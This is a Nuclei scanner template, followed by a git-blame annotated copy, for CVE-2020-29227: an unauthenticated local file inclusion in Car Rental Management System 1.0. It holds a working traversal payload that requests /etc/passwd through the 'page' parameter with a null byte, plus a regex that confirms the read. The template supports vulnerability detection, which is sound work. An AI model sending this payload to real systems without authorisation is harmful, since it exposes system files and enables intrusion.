my-nuclei-templates/CVE-2020-29227.yaml

id: CVE-2020-29227

info:
  name: Car Rental Management System 1.0 - Local File Inclusion
  author: daffainfo
  severity: critical
  description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution.
  reference:
    - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29227
    - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29227
  tags: cve,cve2020,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?page=/etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/05/16
Adding new templates (8.4.2) 2021-07-27 00:25:17 +00:00			`id: CVE-2020-29227`

			`info:`
Added update 9.0.7 2022-06-18 08:05:25 +00:00			`name: Car Rental Management System 1.0 - Local File Inclusion`
Adding new templates (8.4.2) 2021-07-27 00:25:17 +00:00			`author: daffainfo`
Version 8.5.1 2021-09-17 06:03:58 +00:00			`severity: critical`
Added update 9.0.7 2022-06-18 08:05:25 +00:00			`description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution.`
Update 8.4.9 2021-09-02 08:03:02 +00:00			`reference:`
Adding new templates (8.4.2) 2021-07-27 00:25:17 +00:00			`- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-29227`
Added update 9.0.7 2022-06-18 08:05:25 +00:00			`- https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html`
Version 8.5.1 2021-09-17 06:03:58 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
Added update 9.0.7 2022-06-18 08:05:25 +00:00			`cvss-score: 9.8`
Version 8.5.1 2021-09-17 06:03:58 +00:00			`cve-id: CVE-2020-29227`
Added update 9.0.7 2022-06-18 08:05:25 +00:00			`tags: cve,cve2020,lfi`
Adding new templates (8.4.2) 2021-07-27 00:25:17 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/index.php?page=/etc/passwd%00"`
Added update 9.0.7 2022-06-18 08:05:25 +00:00
Adding new templates (8.4.2) 2021-07-27 00:25:17 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: regex`
Added update 9.0.7 2022-06-18 08:05:25 +00:00			`part: body`
Adding new templates (8.4.2) 2021-07-27 00:25:17 +00:00			`regex:`
			`- "root:.*:0:0:"`
Added update 9.0.7 2022-06-18 08:05:25 +00:00
Adding new templates (8.4.2) 2021-07-27 00:25:17 +00:00			`- type: status`
			`status:`
			`- 200`
Added update 9.0.7 2022-06-18 08:05:25 +00:00
			`# Enhanced by mp on 2022/05/16`